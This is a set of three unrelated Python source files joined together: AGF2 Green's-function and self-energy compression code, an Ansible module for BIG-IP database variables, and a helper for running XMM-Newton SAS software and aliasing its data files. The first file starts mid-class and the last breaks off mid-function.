''' Removes poles with very low spectral weight (uncoupled
to the physical space) in-place.
Args:
tol : float
Threshold for the spectral weight (squared norm)
'''
v = self.coupling
w = np.linalg.norm(v, axis=0) ** 2
arg = w >= tol
self.energy = self.energy[arg]
self.coupling = self.coupling[:,arg]
def save(self, chkfile, key=None):
''' Saves the auxiliaries in chkfile
Args:
chkfile : str
Name of chkfile
key : str
Key to be used in h5py object. It can contain "/" to
represent the path in the HDF5 storage structure.
'''
if key is None:
key = 'aux'
lib.chkfile.dump(chkfile, key, self.__dict__)
@classmethod
def load(cls, chkfile, key=None):
''' Loads the auxiliaries from a chkfile
Args:
chkfile : str
Name of chkfile
key : str
Key to be used in h5py object. It can contain "/" to
represent the path in the HDF5 storage structure.
'''
if key is None:
key = 'aux'
dct = lib.chkfile.load(chkfile, key)
return cls(dct['energy'], dct['coupling'], chempot=dct['chempot'])
def copy(self):
''' Returns a copy of the current object.
Returns:
AuxiliarySpace
'''
energy = np.copy(self.energy)
coupling = np.copy(self.coupling)
return self.__class__(energy, coupling, chempot=self.chempot)
@property
def nphys(self):
return self.coupling.shape[0]
@property
def naux(self):
return self.coupling.shape[1]
class SelfEnergy(AuxiliarySpace):
''' Defines a self-energy represented as a :class:`AuxiliarySpace`
object.
'''
def real_freq_spectrum(self, grid, eta=0.02):
raise ValueError('Convert SelfEnergy to GreensFunction before '
'building a spectrum.')
def get_greens_function(self, phys):
''' Returns a :class:`GreensFunction` by solving the Dyson
equation.
Args:
phys : 2D array
Physical space (1p + 1h), typically the Fock matrix
Returns:
:class:`GreensFunction`
'''
w, v = self.eig(phys)
v = v[:self.nphys]
return GreensFunction(w, v, chempot=self.chempot)
def make_rdm1(self, phys, chempot=None, occupancy=2):
''' Returns the first-order reduced density matrix associated
with the self-energy via the :class:`GreensFunction`.
Args:
phys : 2D array
Physical space (1p + 1h), typically the Fock matrix
Kwargs:
chempot : float
If provided, use instead of :attr:`self.chempot`
occupancy : int
Occupancy of the states, i.e. 2 for RHF and 1 for UHF
'''
gf = self.get_greens_function(phys)
return gf.make_rdm1(phys, chempot=chempot, occupancy=occupancy)
def compress(self, phys=None, n=(None, 0), tol=1e-12):
''' Compress the auxiliaries via moments of the particle and
hole Green's function and self-energy. Resulting :attr:`naux`
depends on the chosen :attr:`n`.
Kwargs:
phys : 2D array or None
Physical space (1p + 1h), typically the Fock matrix.
Only required if :attr:`n[0]` is not None.
n : tuple of int
Compression level of the Green's function and
self-energy, respectively.
tol : float
Linear dependecy tolerance. Default value is 1e-12
Returns:
:class:`SelfEnergy` with reduced auxiliary dimension.
Raises:
MemoryError if the compression according to Green's
function moments will exceed the maximum allowed memory.
'''
ngf, nse = n
se = self
if nse is None and ngf is None:
return self.copy()
if nse is not None:
se = compress_via_se(se, n=nse)
if ngf is not None:
se = compress_via_gf(se, phys, n=ngf, tol=tol)
return se
class GreensFunction(AuxiliarySpace):
''' Defines a Green's function represented as a
:class:`AuxiliarySpace` object.
'''
def real_freq_spectrum(self, grid, eta=0.02):
''' Express the auxiliaries as a spectral function on the real
frequency axis.
Args:
grid : 1D array
Real frequency grid
Kwargs:
eta : float
Peak broadening factor in Hartrees. Default is 0.02.
Returns:
ndarray of the spectrum, with the first index being the
frequency
'''
e_shifted = self.energy - self.chempot
v = self.coupling
spectrum = np.zeros((grid.size, self.nphys, self.nphys), dtype=complex)
blksize = 240
p1 = 0
for block in range(0, grid.size, blksize):
p0, p1 = p1, min(p1 + blksize, grid.size)
denom = grid[p0:p1,None] - (e_shifted + eta*1.0j)[None]
spectrum[p0:p1] = lib.einsum('xk,yk,wk->wxy', v, v.conj(), 1./denom)
return -1/np.pi * np.trace(spectrum.imag, axis1=1, axis2=2)
def make_rdm1(self, chempot=None, occupancy=2):
''' Returns the first-order reduced density matrix associated
with the Green's function.
Kwargs:
chempot : float
If provided, use instead of :attr:`self.chempot`
occupancy : int
Occupancy of the states, i.e. 2 for RHF and 1 for UHF
'''
if chempot is None:
chempot = self.chempot
arg = self.energy < chempot
v_occ = self.coupling[:,arg]
rdm1 = np.dot(v_occ, v_occ.T.conj()) * occupancy
return rdm1
def compress(self, *args, **kwargs):
raise ValueError('Compression must be performed on SelfEnergy '
'rather than GreensFunction.')
def combine(*auxspcs):
''' Combine a set of :class:`AuxiliarySpace` objects. attr:`chempot`
is inherited from the first element.
'''
nphys = [auxspc.nphys for auxspc in auxspcs]
if not all([x == nphys[0] for x in nphys]):
raise ValueError('Size of physical space must be the same to '
'combine AuxiliarySpace objects.')
nphys = nphys[0]
naux = sum([auxspc.naux for auxspc in auxspcs])
dtype = np.result_type(*[auxspc.coupling for auxspc in auxspcs])
energy = np.zeros((naux,))
coupling = np.zeros((nphys, naux), dtype=dtype)
p1 = 0
for auxspc in auxspcs:
p0, p1 = p1, p1 + auxspc.naux
energy[p0:p1] = auxspc.energy
coupling[:,p0:p1] = auxspc.coupling
auxspc = auxspcs[0].__class__(energy, coupling, chempot=auxspcs[0].chempot)
return auxspc
def davidson(auxspc, phys, chempot=None, nroots=1, which='SM', tol=1e-14, maxiter=None, ntrial=None):
''' Diagonalise the result of :func:`AuxiliarySpace.get_array` using
the sparse :func:`AuxiliarySpace.dot` method, with the Davidson
algorithm.
This algorithm may perform poorly for IPs or EAs if they are
not extremal eigenvalues, which they are not in standard AGF2.
Args:
auxspc : AuxiliarySpace or subclass
Auxiliary space object to solve for
phys : 2D array
Physical space (1p + 1h), typically the Fock matrix
Kwargs:
chempot : float
If provided, use instead of :attr:`self.chempot`
nroots : int
Number of roots to solve for. Default 1.
which : str
Which eigenvalues to solve for. Options are:
`LM` : Largest (in magnitude) eigenvalues.
`SM` : Smallest (in magnitude) eigenvalues.
`LA` : Largest (algebraic) eigenvalues.
`SA` : Smallest (algebraic) eigenvalues.
Default 'SM'.
tol : float
Convergence threshold
maxiter : int
Maximum number of iterations. Default 10*dim
ntrial : int
Maximum number of trial vectors. Default
min(dim, max(2*nroots+1, 20))
Returns:
tuple of ndarrays (eigenvalues, eigenvectors)
'''
_check_phys_shape(auxspc, phys)
dim = auxspc.nphys + auxspc.naux
if maxiter is None:
maxiter = 10 * dim
if ntrial is None:
ntrial = min(dim, max(2*nroots+1, 20))
if which not in ['SM', 'LM', 'SA', 'LA']:
raise ValueError(which)
if which in ['SM', 'LM']:
abs_op = np.absolute
else:
abs_op = lambda x: x
if which in ['SM', 'SA']:
order = 1
else:
order = -1
matvec = lambda x: auxspc.dot(phys, np.asarray(x))
diag = np.concatenate([np.diag(phys), auxspc.energy])
guess = [np.zeros((dim)) for n in range(nroots)]
mask = np.argsort(abs_op(diag))[::order]
for i in range(nroots):
guess[i][mask[i]] = 1
def pick(w, v, nroots, callback):
mask = np.argsort(abs_op(w))
mask = mask[::order]
w = w[mask]
v = v[:,mask]
return w, v, 0
conv, w, v = lib.davidson1(matvec, guess, diag, tol=tol, nroots=nroots,
max_space=ntrial, max_cycle=maxiter, pick=pick)
return conv, w, v
def _band_lanczos(se_occ, n=0, max_memory=None):
''' Perform the banded Lanczos algorithm for compression of a
self-energy according to consistency in its separate
particle and hole moments.
'''
nblk = n+1
nphys, naux = se_occ.coupling.shape
bandwidth = nblk * nphys
q = np.zeros((bandwidth, naux))
t = np.zeros((bandwidth, bandwidth))
r = np.zeros((naux))
# cholesky qr factorisation of v.T
coupling = se_occ.coupling
x = np.dot(coupling, coupling.T)
try:
v_tri = np.linalg.cholesky(x).T
except np.linalg.LinAlgError:
w, v = np.linalg.eigh(x)
w[w < 1e-20] = 1e-20
x_posdef = np.dot(np.dot(v, np.diag(w)), v.T)
v_tri = np.linalg.cholesky(x_posdef).T
q[:nphys] = np.dot(np.linalg.inv(v_tri).T, coupling)
for i in range(bandwidth):
r[:] = se_occ.energy * q[i]
start = max(i-nphys, 0)
if start != i:
r -= np.dot(t[i,start:i], q[start:i])
for j in range(i, min(i+nphys, bandwidth)):
t[i,j] = t[j,i] = np.dot(r, q[j])
# r := -t[i,j] * q[j] + r
scipy.linalg.blas.daxpy(q[j], r, a=-t[i,j])
if (i+nphys) < bandwidth:
len_r = np.linalg.norm(r)
t[i,i+nphys] = t[i+nphys,i] = len_r
q[i+nphys] = r / (len_r + 1./LARGE_DENOM)
return v_tri, t
def _compress_part_via_se(se_occ, n=0):
''' Compress the auxiliaries of the occupied or virtual part of
the self-energy according to consistency in its moments.
'''
if se_occ.nphys > se_occ.naux:
# breaks this version of the algorithm and is also pointless
e = se_occ.energy.copy()
v = se_occ.coupling.copy()
else:
v_tri, t = _band_lanczos(se_occ, n=n)
e, v = np.linalg.eigh(t)
v = np.dot(v_tri.T, v[:se_occ.nphys])
return e, v
def _compress_via_se(se, n=0):
''' Compress the auxiliaries of the seperate occupied and
virtual parts of the self-energy according to consistency
in its moments.
'''
if se.naux == 0:
return se.energy, se.coupling
se_occ = se.get_occupied()
se_vir = se.get_virtual()
e = []
v = []
if se_occ.naux > 0:
e_occ, v_occ = _compress_part_via_se(se_occ, n=n)
e.append(e_occ)
v.append(v_occ)
if se_vir.naux > 0:
e_vir, v_vir = _compress_part_via_se(se_vir, n=n)
e.append(e_vir)
v.append(v_vir)
e = np.concatenate(e, axis=0)
v = np.concatenate(v, axis=-1)
return e, v
def compress_via_se(se, n=0):
''' Compress the auxiliaries of the seperate occupied and
virtual parts of the self-energy according to consistency
in its moments.
Args:
se : SelfEnergy
Auxiliaries of the self-energy
Kwargs:
n : int
Truncation parameter, conserves the seperate particle
and hole moments to order 2*n+1.
Returns:
:class:`SelfEnergy` with reduced auxiliary dimension
Ref:
[1] H. Muther, T. Taigel and T.T.S. Kuo, Nucl. Phys., 482,
1988, pp. 601-616.
[2] D. Van Neck, K. Piers and M. Waroquier, J. Chem. Phys.,
115, 2001, pp. 15-25.
[3] H. Muther and L.D. Skouras, Nucl. Phys., 55, 1993,
pp. 541-562.
[4] Y. Dewulf, D. Van Neck, L. Van Daele and M. Waroquier,
Phys. Lett. B, 396, 1997, pp. 7-14.
'''
e, v = _compress_via_se(se, n=n)
se_red = SelfEnergy(e, v, chempot=se.chempot)
return se_red
def _build_projector(se, phys, n=0, tol=1e-12):
''' Builds the vectors which project the auxiliary space into a
compress one with consistency in the seperate particle and
hole moments up to order 2n+1.
'''
_check_phys_shape(se, phys)
nphys, naux = se.coupling.shape
w, v = se.eig(phys)
def _part(w, v, s):
en = w[s][None] ** np.arange(n+1)[:,None]
v = v[:,s]
p = np.einsum('xi,pi,ni->xpn', v[nphys:], v[:nphys], en)
return p.reshape(naux, nphys*(n+1))
p = np.hstack((_part(w, v, w < se.chempot),
_part(w, v, w >= se.chempot)))
norm = np.linalg.norm(p, axis=0, keepdims=True)
norm[np.absolute(norm) == 0] = 1./LARGE_DENOM
p /= norm
w, p = np.linalg.eigh(np.dot(p, p.T))
p = p[:, w > tol]
nvec = p.shape[1]
p = np.block([[np.eye(nphys), np.zeros((nphys, nvec))],
[np.zeros((naux, nphys)), p]])
return p
def _compress_via_gf(se, phys, n=0, tol=1e-12):
''' Compress the auxiliaries of the seperate occupied and
virtual parts of the self-energy according to consistency
in the moments of the Green's function
'''
nphys = se.nphys
p = _build_projector(se, phys, n=n, tol=tol)
h_tilde = np.dot(p.T, se.dot(phys, p))
p = None
e, v = np.linalg.eigh(h_tilde[nphys:,nphys:])
v = np.dot(h_tilde[:nphys,nphys:], v)
return e, v
def compress_via_gf(se, phys, n=0, tol=1e-12):
''' Compress the auxiliaries of the seperate occupied and
virtual parts of the self-energy according to consistency
in the moments of the Green's function
Args:
se : SelfEnergy
Auxiliaries of the self-energy
phys : 2D array
Physical space (1p + 1h), typically the Fock matrix
Kwargs:
n : int
Truncation parameter, conserves the seperate particle
and hole moments to order 2*n+1.
tol : float
Linear dependecy tolerance. Default value is 1e-12
Returns:
:class:`SelfEnergy` with reduced auxiliary dimension
'''
e, v = _compress_via_gf(se, phys, n=n, tol=tol)
se_red = SelfEnergy(e, v, chempot=se.chempot)
return se_red
def _check_phys_shape(auxspc, phys):
if np.shape(phys) != (auxspc.nphys, auxspc.nphys):
raise ValueError('Size of physical space must be the same as '
'leading dimension of couplings.')
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: bigip_sys_db
short_description: Manage BIG-IP system database variables
description:
- Manage BIG-IP system database variables
version_added: "2.2"
options:
key:
description:
- The database variable to manipulate.
required: True
state:
description:
- The state of the variable on the system. When C(present), guarantees
that an existing variable is set to C(value). When C(reset) sets the
variable back to the default value. At least one of value and state
C(reset) are required.
required: False
default: present
choices:
- present
- reset
value:
description:
- The value to set the key to. At least one of value and state C(reset)
are required.
required: False
notes:
- Requires the f5-sdk Python package on the host. This is as easy as pip
install f5-sdk.
- Requires BIG-IP version 12.0.0 or greater
extends_documentation_fragment: f5
requirements:
- f5-sdk
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = '''
- name: Set the boot.quiet DB variable on the BIG-IP
bigip_sys_db:
user: "admin"
password: "secret"
server: "lb.mydomain.com"
key: "boot.quiet"
value: "disable"
delegate_to: localhost
- name: Disable the initial setup screen
bigip_sys_db:
user: "admin"
password: "secret"
server: "lb.mydomain.com"
key: "setup.run"
value: "false"
delegate_to: localhost
- name: Reset the initial setup screen
bigip_sys_db:
user: "admin"
password: "secret"
server: "lb.mydomain.com"
key: "setup.run"
state: "reset"
delegate_to: localhost
'''
RETURN = '''
name:
description: The key in the system database that was specified
returned: changed and success
type: string
sample: "setup.run"
default_value:
description: The default value of the key
returned: changed and success
type: string
sample: "true"
value:
description: The value that you set the key to
returned: changed and success
type: string
sample: "false"
'''
from ansible.module_utils.f5_utils import AnsibleF5Client
from ansible.module_utils.f5_utils import AnsibleF5Parameters
from ansible.module_utils.f5_utils import HAS_F5SDK
from ansible.module_utils.f5_utils import F5ModuleError
try:
from ansible.module_utils.f5_utils import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
class Parameters(AnsibleF5Parameters):
api_map = {
'defaultValue': 'default_value'
}
api_attributes = ['value']
updatables = ['value']
returnables = ['name', 'value', 'default_value']
def to_return(self):
result = {}
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
return result
def api_params(self):
result = {}
for api_attribute in self.api_attributes:
if self.api_map is not None and api_attribute in self.api_map:
result[api_attribute] = getattr(self, self.api_map[api_attribute])
else:
result[api_attribute] = getattr(self, api_attribute)
result = self._filter_params(result)
return result
@property
def name(self):
return self._values['key']
@name.setter
def name(self, value):
self._values['key'] = value
class ModuleManager(object):
def __init__(self, client):
self.client = client
self.have = None
self.want = Parameters(self.client.module.params)
self.changes = Parameters()
def _update_changed_options(self):
changed = {}
for key in Parameters.updatables:
if getattr(self.want, key) is not None:
attr1 = getattr(self.want, key)
attr2 = getattr(self.have, key)
if attr1 != attr2:
changed[key] = attr1
if self.want.state == 'reset':
if str(self.want.value) == str(self.want.default_value):
changed[self.want.key] = self.want.value
if changed:
self.changes = Parameters(changed)
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
try:
if state == "present":
changed = self.present()
elif state == "reset":
changed = self.reset()
except iControlUnexpectedHTTPError as e:
raise F5ModuleError(str(e))
changes = self.changes.to_return()
result.update(**changes)
result.update(dict(changed=changed))
return result
def read_current_from_device(self):
resource = self.client.api.tm.sys.dbs.db.load(
name=self.want.key
)
result = resource.attrs
return Parameters(result)
def exists(self):
resource = self.client.api.tm.sys.dbs.db.load(
name=self.want.key
)
if str(resource.value) == str(self.want.value):
return True
return False
def present(self):
if self.exists():
return False
else:
return self.update()
def update(self):
if self.want.value is None:
raise F5ModuleError(
"When setting a key, a value must be supplied"
)
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.client.check_mode:
return True
self.update_on_device()
return True
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update_on_device(self):
params = self.want.api_params()
resource = self.client.api.tm.sys.dbs.db.load(
name=self.want.key
)
resource.update(**params)
def reset(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.client.check_mode:
return True
self.update_on_device()
if self.exists():
return True
else:
raise F5ModuleError(
"Failed to reset the DB variable"
)
def reset_on_device(self):
resource = self.client.api.tm.sys.dbs.db.load(
name=self.want.key
)
resource.update(value=self.want.default_value)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
self.argument_spec = dict(
key=dict(required=True),
state=dict(
default='present',
choices=['present', 'reset']
),
value=dict()
)
self.f5_product_name = 'bigip'
def main():
if not HAS_F5SDK:
raise F5ModuleError("The python f5-sdk module is required")
spec = ArgumentSpec()
client = AnsibleF5Client(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
f5_product_name=spec.f5_product_name
)
try:
mm = ModuleManager(client)
results = mm.exec_module()
client.module.exit_json(**results)
except F5ModuleError as e:
client.module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
| |
# -*- mode: python; coding: utf-8 -*-
# Copyright 2015-2018 Peter Williams <peter@newton.cx> and collaborators.
# Licensed under the MIT License.
"""sas - running software in the SAS environment
To use, export an environment variable $PWKIT_SAS pointing to the SAS
installation root. The files $PWKIT_SAS/RELEASE and $PWKIT_SAS/setsas.sh
should exist. The "current calibration files" (CCF) should be accessible as
$PWKIT_SAS/ccf/; a symlink may make sense if multiple SAS versions are going
to be used.
SAS is unusual because you need to set up some magic environment variables
specific to the dataset that you're working with. There is also default
preparation to be run on each dataset before anything useful can be done.
Unpacking data sets
==========================
Data sets are downloaded as tar.gz files. Those unpack to a few files in '.'
including a .TAR file, which should be unpacked too. That unpacks to a bunch
of data files in '.' as well.
SAS installation notes
==========================
Download tarball from, e.g.,
ftp://legacy.gsfc.nasa.gov/xmm/software/sas/14.0.0/64/Linux/Fedora20/
Tarball unpacks installation script and data into '.', and the installation
script sets up a SAS install in a versioned subdirectory of '.', so curl|tar
should be run from something like /a/sas::
$ ./install.sh
The CCF are like CALDB and need to be rsynced -- see the update-ccf
subcommand.
ODF data format notes
=========================
ODF files all have names in the format RRRR_NNNNNNNNNN_IIUEEECCMMM.ZZZ where:
RRRR
revolution (orbit) number
NNNNNNNNNN
obs ID
II
The instrument:
OM
optical monitor
R1
RGS (reflection grating spectrometer) unit 1
R2
RGS 2
M1
EPIC (imaging camera) MOS 1 detector
M2
EPIC (imaging camera) MOS 2 detector
PN
EPIC (imaging camera) PN detector
RM
EPIC radiation monitor
SC
spacecraft
U
Scheduling status of exposure:
S
scheduled
U
unscheduled
X
N/A
EEE
exposure number
CC
CCD/OM-window ID
MMM
data type of file (many; not listed here)
ZZZ
file extension
See the ``make-*-aliases`` commands for tools that generate symlinks with saner
names.
"""
from __future__ import absolute_import, division, print_function
__all__ = ''.split()
import io, os.path, six
from ... import PKError, cli
from ...cli import multitool
from ...io import Path
from .. import Environment, prepend_environ_path, user_data_path
class SasEnvironment(Environment):
_odfdir = None
_revnum = None
_obsid = None
_sumsas = None
_installdir = None
_heaenv = None
def __init__(self, manifest, installdir=None, heaenv=None):
if installdir is None:
installdir = self._default_installdir()
if heaenv is None:
from .. import heasoft
heaenv = heasoft.HeasoftEnvironment()
self._installdir = os.path.abspath(installdir)
self._heaenv = heaenv
# TODO: I used to read the manifest file to infer both the revolution
# number and obsid, but in the case of 0673000145, the obsid mentioned
# in the manifest is different! (But close: 0673000101.) So now I glob
# the containing directory for that.
manifest = Path(manifest)
for line in manifest.read_lines():
if not line.startswith('File '):
continue
bits = line.split()[1].split('_')
if len(bits) < 3:
continue
self._revnum = bits[0] # note: kept as a string; not an int
break
self._odfdir = Path(manifest).resolve().parent
for p in self._odfdir.glob('%s_*_*.FIT' % self._revnum):
bits = p.name.split('_')
self._obsid = bits[1]
break
self._sumsas = self._odfdir / ('%s_%s_SCX00000SUM.SAS' % (self._revnum, self._obsid))
def _default_installdir(self):
d = os.environ.get('PWKIT_SAS')
if d is None:
raise PKError('SAS installation directory must be specified '
'in the $PWKIT_SAS environment variable')
return d
def modify_environment(self, env):
self._heaenv.modify_environment(env)
def path(*args):
return os.path.join(self._installdir, *args)
env['SAS_DIR'] = path()
env['SAS_PATH'] = env['SAS_DIR']
env['SAS_CCFPATH'] = path('ccf')
env['SAS_ODF'] = str(self._sumsas) # but see _preexec
env['SAS_CCF'] = str(self._odfdir / 'ccf.cif')
prepend_environ_path(env, 'PATH', path('bin'))
prepend_environ_path(env, 'LD_LIBRARY_PATH', path('libextra'))
prepend_environ_path(env, 'LD_LIBRARY_PATH', path('lib'))
prepend_environ_path(env, 'PERL5LIB', path('lib', 'perl5'))
env['SAS_BROWSER'] = 'firefox' # yay hardcoding
env['SAS_IMAGEVIEWER'] = 'ds9'
env['SAS_SUPPRESS_WARNING'] = '1'
env['SAS_VERBOSITY'] = '4'
# These can be helpful:
env['PWKIT_SAS_REVNUM'] = self._revnum
env['PWKIT_SAS_OBSID'] = self._obsid
return env
def _preexec(self, env, printbuilds=True):
from ...cli import wrapout
# Need to compile the CCF info?
cif = env['SAS_CCF']
if not os.path.exists(cif):
if printbuilds:
print('[building %s]' % cif)
env['SAS_ODF'] = str(self._odfdir)
log = self._odfdir / 'cifbuild.log'
with log.open('wb') as f:
w = wrapout.Wrapper(f)
w.use_colors = True
if w.launch('cifbuild', ['cifbuild'], env=env, cwd=str(self._odfdir)):
raise PKError('failed to build CIF; see %s', log)
if not os.path.exists(cif):
# cifbuild can exit with status 0 whilst still having failed
raise PKError('failed to build CIF; see %s', log)
env['SAS_ODF'] = str(self._sumsas)
# Need to generate SUM.SAS file?
if not self._sumsas.exists():
if printbuilds:
print('[building %s]' % self._sumsas)
env['SAS_ODF'] = str(self._odfdir)
log = self._odfdir / 'odfingest.log'
with log.open('wb') as f:
w = wrapout.Wrapper(f)
w.use_colors = True
if w.launch('odfingest', ['odfingest'], env=env, cwd=str(self._odfdir)):
raise PKError('failed to build CIF; see %s', log)
env['SAS_ODF'] = str(self._sumsas)
# Command-line interface
class Exec(multitool.Command):
name = 'exec'
argspec = '<manifest> <command> [args...]'
summary = 'Run a program in SAS.'
more_help = '''Due to the way SAS works, the path to a MANIFEST.nnnnn file in an ODF
directory must be specified, and all operations work on the specified data
set.'''
def invoke(self, args, **kwargs):
if len(args) < 2:
raise multitool.UsageError('exec requires at least 2 arguments')
manifest = args[0]
progargv = args[1:]
env = SasEnvironment(manifest)
env.execvpe(progargv)
class MakeEPICAliases(multitool.Command):
name = 'make-epic-aliases'
argspec = '<srcdir> <destdir>'
summary = 'Generate user-friendly aliases to XMM-Newton EPIC data files.'
more_help = '''destdir should already not exist and will be created. <srcdir> should
be the ODF directory, containing a file named MANIFEST.<numbers> and many others.'''
INSTRUMENT = slice(16, 18)
EXPFLAG = slice(18, 19) # 'S': sched, 'U': unsched; 'X': N/A
EXPNO = slice(19, 22)
CCDNO = slice(22, 24)
DTYPE = slice(24, 27)
EXTENSION = slice(28, None)
instrmap = {
'M1': 'mos1',
'M2': 'mos2',
'PN': 'pn',
'RM': 'radmon',
}
extmap = {
'FIT': 'fits',
}
dtypemap = {
'aux': 'aux',
'bue': 'burst',
'ccx': 'counting_cycle',
'cte': 'compressed_timing',
'dii': 'diagnostic',
'dli': 'discarded_lines',
'ecx': 'hk_extraheating_config', # or radiation mon count rate
'esx': 'spectra', # radiation monitor spectra, that is
'hbh': 'hk_hbr_buffer',
'hch': 'hk_hbr_config',
'hdi': 'high_rate_offset_data',
'hth': 'hk_hbr_threshold',
'ime': 'imaging',
'noi': 'noise',
'odi': 'offset_data',
'ove': 'offset_variance',
'pah': 'hk_additional',
'peh': 'hk_periodic',
'pmh': 'hk_main',
'pth': 'hk_bright_pixels',
'rie': 'reduced_imaging',
'tmh': 'hk_thermal_limits',
'tie': 'timing',
}
def invoke(self, args, **kwargs):
if len(args) != 2:
raise multitool.UsageError('make-epic-aliases requires exactly 2 arguments')
srcdir = Path(args[0])
destdir = Path(args[1])
srcpaths = [x for x in srcdir.iterdir() if len(x.name) > 28]
# Sorted list of exposure numbers.
expnos = dict((i, set()) for i in six.iterkeys(self.instrmap))
for p in srcpaths:
instr = p.name[self.INSTRUMENT]
if instr not in self.instrmap:
continue
expno = int(p.name[self.EXPNO])
dtype = p.name[self.DTYPE]
if expno > 0 and dtype not in ('DLI', 'ODI'):
expnos[instr].add(expno)
expseqs = {}
for k, v in six.iteritems(expnos):
expseqs[self.instrmap[k]] = dict((n, i) for i, n in enumerate(sorted(v)))
# Do it.
stems = set()
destdir.mkdir() # intentionally crash if exists; easiest approach
for p in srcpaths:
instr = p.name[self.INSTRUMENT]
if instr not in self.instrmap:
continue
eflag = p.name[self.EXPFLAG]
expno = p.name[self.EXPNO]
ccdno = p.name[self.CCDNO]
dtype = p.name[self.DTYPE]
ext = p.name[self.EXTENSION]
instr = self.instrmap[instr]
expno = int(expno)
dtype = self.dtypemap[dtype.lower()]
ext = self.extmap[ext]
if expno > 0 and dtype not in ('discarded_lines', 'offset_data'):
expno = expseqs[instr][expno]
if instr == 'radmon' and dtype == 'hk_extraheating_config':
dtype = 'rates'
if instr == 'radmon' or dtype == 'aux':
stem = '%s_e%03d_%s.%s' % (instr, expno, dtype, ext)
elif ccdno == '00':
stem = '%s_%s.%s' % (instr, dtype, ext)
elif dtype in ('discarded_lines', 'offset_data'):
stem = '%s_%s_e%03d_c%s.%s' % (instr, dtype, expno, ccdno, ext)
else:
stem = '%s_e%03d_c%s_%s.%s' % (instr, expno, ccdno, dtype, ext)
if stem in stems:
cli.die('short identifier clash: %r', stem)
stems.add(stem)
(destdir / stem).rellink_to(p)
class MakeOMAliases(multitool.Command):
name = 'make-om-aliases'
argspec = '<srcdir> <destdir>'
summary = 'Generate user-friendly aliases to XMM-Newton OM data files.'
more_help = 'destdir should already not exist and will be created.'
PROD_TYPE = slice(0, 1) # 'P': final product; 'F': intermediate
OBSID = slice(1, 11)
EXPFLAG = slice(11, 12) # 'S': sched, 'U': unsched; 'X': N/A
EXPNO = slice(14, 17) # (12-14 is the string 'OM')
DTYPE = slice(17, 23)
WINNUM = slice(23, 24)
SRCNUM = slice(24, 27)
EXTENSION = slice(28, None)
extmap = {
'ASC': 'txt',
'FIT': 'fits',
'PDF': 'pdf',
'PS': 'ps',
}
dtypemap = {
'image_': 'image_ccd',
'simage': 'image_sky',
'swsrli': 'source_list',
'timesr': 'lightcurve',
'tshplt': 'tracking_plot',
'tstrts': 'tracking_stars',
}
def invoke(self, args, **kwargs):
if len(args) != 2:
raise multitool.UsageError('make-om-aliases requires exactly 2 arguments')
from fnmatch import fnmatch
srcdir, destdir = args
srcfiles = [x for x in os.listdir(srcdir)
if x[0] == 'P' and len(x) > 28]
# Sorted list of exposure numbers.
expnos = set()
for f in srcfiles:
if not fnmatch(f, 'P*IMAGE_*.FIT'):
continue
expnos.add(f[self.EXPNO])
expseqs = dict((n, i) for i, n in enumerate(sorted(expnos)))
# Do it.
idents = set()
os.mkdir(destdir) # intentionally crash if exists; easiest approach
for f in srcfiles:
ptype = f[self.PROD_TYPE]
obsid = f[self.OBSID]
eflag = f[self.EXPFLAG]
expno = f[self.EXPNO]
dtype = f[self.DTYPE]
winnum = f[self.WINNUM]
srcnum = f[self.SRCNUM]
ext = f[self.EXTENSION]
seq = expseqs[expno]
dtype = self.dtypemap[dtype.lower()]
ext = self.extmap[ext]
# There's only one clash, and it's easy:
if dtype == 'lightcurve' and ext == 'pdf':
continue
ident = (seq, dtype)
if ident in idents:
cli.die('short identifier clash: %r', ident)
idents.add(ident)
oldpath = os.path.join(srcdir, f)
newpath = os.path.join(destdir, '%s.%02d.%s' % (dtype, seq, ext))
os.symlink(os.path.relpath(oldpath, destdir), newpath)
class MakeRGSAliases(multitool.Command):
name = 'make-rgs-aliases'
argspec = '<srcdir> <destdir>'
summary = 'Generate user-friendly aliases to XMM-Newton RGS data files.'
more_help = '''destdir should already not exist and will be created. <srcdir> should
be the ODF directory, containing a file named MANIFEST.<numbers> and many others.'''
INSTRUMENT = slice(16, 18)
EXPFLAG = slice(18, 19) # 'S': sched, 'U': unsched; 'X': N/A
EXPNO = slice(19, 22)
CCDNO = slice(22, 24)
DTYPE = slice(24, 27)
EXTENSION = slice(28, None)
instrmap = {
'R1': 'rgs1',
'R2': 'rgs2',
}
extmap = {
'FIT': 'fits',
}
dtypemap = {
'aux': 'aux',
'd1h': 'hk_dpp1',
'd2h': 'hk_dpp2',
'dii': 'diagnostic',
'hte': 'high_time_res',
'ofx': 'offset',
'pch': 'hk_ccd_temp',
'pfh': 'hk_periodic',
'spe': 'spectra',
}
def invoke(self, args, **kwargs):
if len(args) != 2:
raise multitool.UsageError('make-rgs-aliases requires exactly 2 arguments')
srcdir = Path(args[0])
destdir = Path(args[1])
srcpaths = [x for x in srcdir.iterdir() if len(x.name) > 28]
# Sorted list of exposure numbers.
expnos = dict((i, set()) for i in six.iterkeys(self.instrmap))
for p in srcpaths:
instr = p.name[self.INSTRUMENT]
if instr not in self.instrmap:
continue
expno = int(p.name[self.EXPNO])
if expno > 0 and expno < 900:
expnos[instr].add(expno)
expseqs = {}
for k, v in six.iteritems(expnos):
expseqs[self.instrmap[k]] = dict((n, i) for i, n in enumerate(sorted(v)))
# Do it.
stems = set()
destdir.mkdir() # intentionally crash if exists; easiest approach
for p in srcpaths:
instr = p.name[self.INSTRUMENT]
if instr not in self.instrmap:
continue
eflag = p.name[self.EXPFLAG]
expno = p.name[self.EXPNO]
ccdno = p.name[self.CCDNO]
dtype = p.name[self.DTYPE]
ext = p.name[self.EXTENSION]
instr = self.instrmap[instr]
